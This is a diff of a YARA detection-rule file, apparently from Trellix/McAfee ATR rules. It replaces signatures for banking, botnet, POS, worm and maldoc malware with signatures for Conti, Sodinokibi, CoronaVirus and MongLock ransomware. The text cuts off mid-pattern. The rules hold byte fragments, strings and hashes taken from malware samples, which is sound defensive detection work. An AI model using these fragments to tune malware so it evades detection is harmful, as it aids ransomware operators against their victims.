+		$s6 = { 48 00 54 00 4D 00 4C 00 5F 00 49 00 4D 00 47 00 23 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 4C 00 49 00 5F 00 43 00 41 00 50 00 54 00 49 00 4F 00 4E 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 29 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 41 00 47 00 45 00 53 00 5F 00 53 00 42 00 5F 00 48 00 5F 00 53 00 43 00 52 00 4F 00 4C 00 4C 00 5F 00 50 00 52 00 45 00 56 00 5F 00 48 00 4F 00 56 00 45 00 52 00 5F 00 50 00 4E 00 47 00 31 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 4F 00 52 00 41 00 4E 00 47 00 45 00 5F 00 43 00 4C 00 4F 00 53 00 45 00 5F 00 50 00 4E 00 47 00 32 00 49 00 44 00 52 00 5F 00 48 00 54 00 4D 00 5F 00 49 00 4D 00 47 00 5F 00 50 00 41 00 47 00 45 00 5F 00 54 00 49 00 54 00 4C 00 45 00 5F 00 49 00 43 00 4F 00 4E 00 5F 00 4D 00 45 00 4E 00 55 00 5F 00 50 00 41 00 49 00 44 00 5F 00 53 00 45 00 54 00 54 00 49 00 4E 00 47 00 53 00 5F 00 50 00 4E 00 47 00 }
+		$s7 = { 25 73 5C 6C 6F 67 5F 25 30 34 64 25 30 32 64 25 30 32 64 5F 25 64 2E 6C 6F 67 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 360KB and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
 }
-rule TRELLIX_ARC_Shifu : FINANCIAL
+rule TRELLIX_ARC_Ransomware_Coronavirus : RANSOMWARE FILE
 {
 	meta:
-		description = "No description has been set in the source file - Trellix ARC"
-		author = "McAfee Labs"
-		id = "81e9ad25-1df0-5196-be8b-1d1d5d8e4387"
-		date = "2026-02-01"
+		description = "Rule to detect the Corona Virus ransomware"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "4195a57b-cd51-5050-861a-6436f7ec4eca"
+		date = "2020-03-25"
 		modified = "2020-08-14"
-		reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_Shifu.yar#L1-L24"
+		reference = "https://twitter.com/malwrhunterteam/status/1238056503493505024"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_coronavirus.yar#L43-L80"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "dfa6165f8d2750330c71dedbde293780d2bb27e8eb3635e47ca770ff7b9a9d63"
+		hash = "3299f07bc0711b3587fe8a1c6bf3ee6bcbc14cb775f64b28a61d72ebcb8968d3"
+		logic_hash = "2a7e1676a20f30b0cb0321579bb85e4836e2aee5f56b838d2ff2bec7a08c489f"
 		score = 75
-		quality = 70
-		tags = "FINANCIAL"
-		malware_type = "financial"
-		malware_family = "Backdoor:W32/Shifu"
+		quality = 64
+		tags = "RANSOMWARE, FILE"
+		rule_version = "v1"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/CoronaVirus"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$b = "RegCreateKeyA"
-		$a = "CryptCreateHash"
-		$c = {2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E}
-		$d = {53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65}
-		$e = {52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45}
+		$s1 = { 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 25 73 }
+		$s2 = { 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 25 00 73 00 }
+		$s3 = { 2F 00 75 00 70 00 6C 00 6F 00 61 00 64 00 2F 00 25 00 73 00 5F 00 25 00 64 00 5F 00 25 00 73 00 }
+		$s4 = { 53 59 53 54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 6F 6C 53 65 74 5C 43 6F 6E 74 72 6F 6C 5C 53 65 73 73 69 6F 6E 20 4D 61 6E 61 67 65 72 }
+		$s5 = { 5C 5C 2E 5C 50 68 79 73 69 63 61 6C 44 72 69 76 65 25 64 }
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
 }
-rule TRELLIX_ARC_MALW_Liquorbot : MALWARE FILE
+
+rule TRELLIX_ARC_Ransom_Conti : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect LiquorBot malware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "73898df8-b5eb-50ac-a2fe-ef9233c251c5"
-		date = "2020-08-19"
-		modified = "2020-08-19"
-		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_liquorbot.yar#L1-L23"
+		description = "Conti ransomware is havnig capability too scan and encrypt oover the network"
+		author = "McAfee ATR team"
+		id = "8fc6943d-fb99-5957-929b-4c264d9fba2d"
+		date = "2020-07-09"
+		modified = "2020-10-12"
+		reference = "https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/Ransom_Conti.yar#L3-L37"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "2448e3ede809331b2370fe9d42d603ad6508be6531a1a8764e0e0621867b6e89"
+		hash = "eae876886f19ba384f55778634a35a1d975414e83f22f6111e3e792f706301fe"
+		logic_hash = "953471c130309bbc712197d49d2072bd45838f49d2b25f86273a15c6baa87354"
 		score = 75
 		quality = 70
-		tags = "MALWARE, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "malware"
-		malware_family = "Botnet:W32/LiquorBot"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Conti"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
-		hash1 = "5b2a9cbda99ed903f75c3b37f0a6b1b9f6c39671a76ed652f3ddba117fd43bc9"
 
 	strings:
-		$pattern = { 7F454C4602010100000000000000000002003E0001000000605A4600000000004000000000000000700200000000000000000000400038000A0040001B00090006000000040000004000000000000000400040000000000040004000000000003002000000000000300200000000000000100000000000000300000004000000E00F000000000000E00F400000000000E00F40000000000020000000000000002000000000000000010000000000000004000000040000007C0F0000000000007C0F4000000000007C0F400000000000640000000000000064000000000000000400000000000000010000000500000000000000000000000000400000000000000040000000000040FB29000000000040FB2900000000000010000000000000010000000400000000002A000000000000006A000000000000006A0000000000E4492C0000000000E4492C000000000000100000000000000100000006000000005056000000000000509600000000000050960000000000E014040000000000681307000000000000100000000000000200000006000000405156000000000040519600000000004051960000000000300100000000000030010000000000000800000000000000070000000400000000000000000000000000000000000000000000000000000000000000000000000800000000000000080000000000000051E574640600000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000080150465002A00000000000000000000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000010000000600000000000000001040000000000000100000000000001FE9290000000000000000000000000010000000000000000000000000000000F000000001000000060000000000000020F969000000000020F929000000000020020000000000000000000000000000100000000000000010000000000000007000000001000000020000000000000000006A000000000000002A0000000000A678110000000000000000000000000020000000000000000000000000000000E0000000040000000200000000000000A8787B0000000000A8783B000000000018000000000000000B0000000000000008000000000000001800000000000000E6000000040000000200000000000000C0787B0000000000C0783B000000000018030000000000000B0000000200000008000000000000001800000000000000F5000000FF }
+		$string1 = "HOW_TO_DECRYPTP" fullword ascii
+		$string2 = "The system is LOCKED." fullword ascii
+		$string3 = "The network is LOCKED." fullword ascii
+		$code1 = { ff b4 b5 48 ff ff ff 53 ff 15 bc b0 41 00 85 c0 }
+		$code2 = { 6a 02 6a 00 6a ff 68 ec fd ff ff ff 76 0c ff 15 }
+		$code3 = { 56 8d 85 38 ff ff ff 50 ff d7 85 c0 0f 84 f2 01 }
 
 	condition:
-		uint16( 0 ) == 0x457f and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and pe.number_of_sections == 5 and ( pe.imphash ( ) == "30fe3f044289487cddc09bfb16ee1fde" or ( all of them and all of ( $code* ) ) )
 }
-rule TRELLIX_ARC_Kartoxa_Malware_Pdb : POS FILE
+
+rule TRELLIX_ARC_Ransomware_Sodinokibi : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Kartoxa POS based on the PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "3d2dbf22-5d8f-5f19-9048-2d021ada22c8"
-		date = "2010-10-09"
-		modified = "2020-08-14"
-		reference = "https://securitynews.sonicwall.com/xmlpost/guatambu-new-multi-component-infostealer-drops-kartoxa-pos-malware-apr-08-2016/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_backdoor_katorxa_pdb.yar#L1-L25"
+		description = "Using a recently disclosed vulnerability in Oracle WebLogic, criminals use it to install a new variant of ransomware called “Sodinokibi"
+		author = "Christiaan Beek | McAfee ATR team"
+		id = "573e3390-1ee5-5489-a67e-decc02aea7a0"
+		date = "2019-05-13"
+		modified = "2025-03-18"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Sodinokibi.yar#L3-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "86dd21b8388f23371d680e2632d0855b442f0fa7e93cd009d6e762715ba2d054"
-		logic_hash = "6e1810af386f3aada4cd1d72f76d8210d201808c8fe1d21d379ff1a825d93710"
+		logic_hash = "cb5d4e9a7cbec27d693ed73bab4be598614d7bd5ebd23d7907730571a4174be8"
 		score = 75
 		quality = 70
-		tags = "POS, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "pos"
-		malware_family = "Pos:W32/Kartoxa"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Sodinokibi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash4 = "9b62f917afa1c1a61e3be0978c8692dac797dd67ce0e5fd2305cc7c6b5fef392"
 
 	strings:
-		$pdb = "\\vm\\devel\\dark\\mmon\\Release\\mmon.pdb"
+		$x1 = "sodinokibi.exe" fullword wide
+		$y0 = { 8d 85 6c ff ff ff 50 53 50 e8 62 82 00 00 83 c4 }
+		$y1 = { e8 24 ea ff ff ff 75 08 8b ce e8 61 fc ff ff 8b }
+		$y2 = { e8 01 64 ff ff ff b6 b0 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and pe.imphash ( ) == "672b84df309666b9d7d2bc8cc058e4c2" and all of ( $y* ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Malw_Inabot_Worm : WORM FILE
+rule TRELLIX_ARC_Sodinokobi : RANSOMWARE
 {
 	meta:
-		description = "Rule to detect inabot worm based on PDB"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "b899d2d6-000a-5363-9efe-527dcd0cea17"
-		date = "2013-04-19"
-		modified = "2020-08-14"
-		reference = "http://verwijderspyware.blogspot.com/2013/04/elimineren-w32inabot-worm-hoe-te.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALW_inabot_worm_pdb.yar#L1-L25"
+		description = "This rule detect Sodinokobi Ransomware in memory in old samples and perhaps future."
+		author = "McAfee ATR team"
+		id = "dd05ce31-9699-50a9-944c-5883340791af"
+		date = "2026-03-01"
+		modified = "2025-03-18"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Sodinokibi.yar#L32-L53"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c9c010228254aae222e31c669dda639cdd30695729b8ef2b6ece06d899a496aa"
-		logic_hash = "70485de4e071b684faa87484ce2a53a8b2a29d0a2954e785b858c7ff1d908de0"
+		logic_hash = "f25039ac743223756461bbeeb349c674473608f9959bf3c79ce4a7587fde3ab2"
 		score = 75
 		quality = 70
-		tags = "WORM, FILE"
-		rule_version = "v1"
-		malware_type = "worm"
-		malware_family = "Worm:W32/Inabot"
+		tags = "RANSOMWARE"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Sodinokibi"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		version = "1.0"
 
 	strings:
-		$pdb = "\\trasser\\portland.pdb"
-		$pdb1 = "\\mainstream\\archive.pdb"
+		$a = { 40 0F B6 C8 89 4D FC 8A 94 0D FC FE FF FF 0F B6 C2 03 C6 0F B6 F0 8A 84 35 FC FE FF FF 88 84 0D FC FE FF FF 88 94 35 FC FE FF FF 0F B6 8C 0D FC FE FF FF }
+		$b = { 0F B6 C2 03 C8 8B 45 14 0F B6 C9 8A 8C 0D FC FE FF FF 32 0C 07 88 08 40 89 45 14 8B 45 FC 83 EB 01 75 AA }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and any of them
+		all of them
 }
-rule TRELLIX_ARC_Rtf_Bluetea_Builder : MALDOC FILE
+rule TRELLIX_ARC_Ransom_Monglock : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the RTF files created to distribute BlueTea trojan"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "20e4f7b2-b36c-5724-a3aa-4216ed6265ab"
-		date = "2020-04-21"
+		description = "Ransomware encrypting Mongo Databases "
+		author = "Christiaan Beek - McAfee ATR team"
+		id = "4350a874-dd76-5379-af9f-f1d190385706"
+		date = "2019-04-25"
 		modified = "2020-08-14"
-		reference = "https://blog.360totalsecurity.com/en/bluetea-action-drive-the-life-trojan-update-email-worm-module-and-spread-through-covid-19-outbreak/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/malware/MALDOC_rtf_bluetea_builder.yar#L1-L30"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_MONGOLOCK.yar#L1-L41"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "4a3eeaed22342967a95302a4f087b25f50d61314facc6791f756dcd113d4f277"
-		logic_hash = "6c4007fb7ef4819141db63050215dcbb3d2c17e7cdcdbb6cfb4f4b045bb5736b"
+		logic_hash = "245a7377a410828ed8bc7148f36af6d143ad20d16840238ed5b6d6f94f015984"
 		score = 75
 		quality = 70
-		tags = "MALDOC, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "maldoc"
-		malware_family = "Maldoc:W32/BlueTea"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/MongLock"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash5 = "c4de2d485ec862b308d00face6b98a7801ce4329a8fc10c63cf695af537194a8"
 
 	strings:
-		$sequence = { 7B??72??6631??????65666C616E6731??32??????????69??????????????67????36??75??32??????656666????35????????656666????????73??666462????33??35????????74??68????????68????????36??73??73??66??????68????????36??73??73??6662????5C646566??616E6731??33??5C646566??616E67666532??35????????656D656C616E6731??33??5C74??656D656C616E67666532??35????????656D656C616E6763????7B??666F6E74??62??????6630??????69??????????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??32??3630??30??????????30??30??30????????????73??4E6577??526F6D616E3B????0A????6631??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??2763????2763????2763????276535????????66616C74??5369????????????7D??5C6633????6662????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20??32??34??35????????30????3630??30??30????????????72??6120????74??3B????0A????6633??5C6662????69??????????69????????????6172??6574??5C6670??71??7B??2A??????6E6F73??20??32??6630??????????30??30????33??32??34??43616C69????????????5C6633??5C6662????69??????????6C5C6663????72??6574??33????6670??71??7B??2A??????6E6F73??20??32??31??3630??30??30??30??30??30??30??7D??5C2763????2763????2763????276535????????7B??666C6F6D616A??72??6633??35????????62????69??????????6D616E5C6663????72??6574??5C6670??71??7B??2A??????6E6F73??20?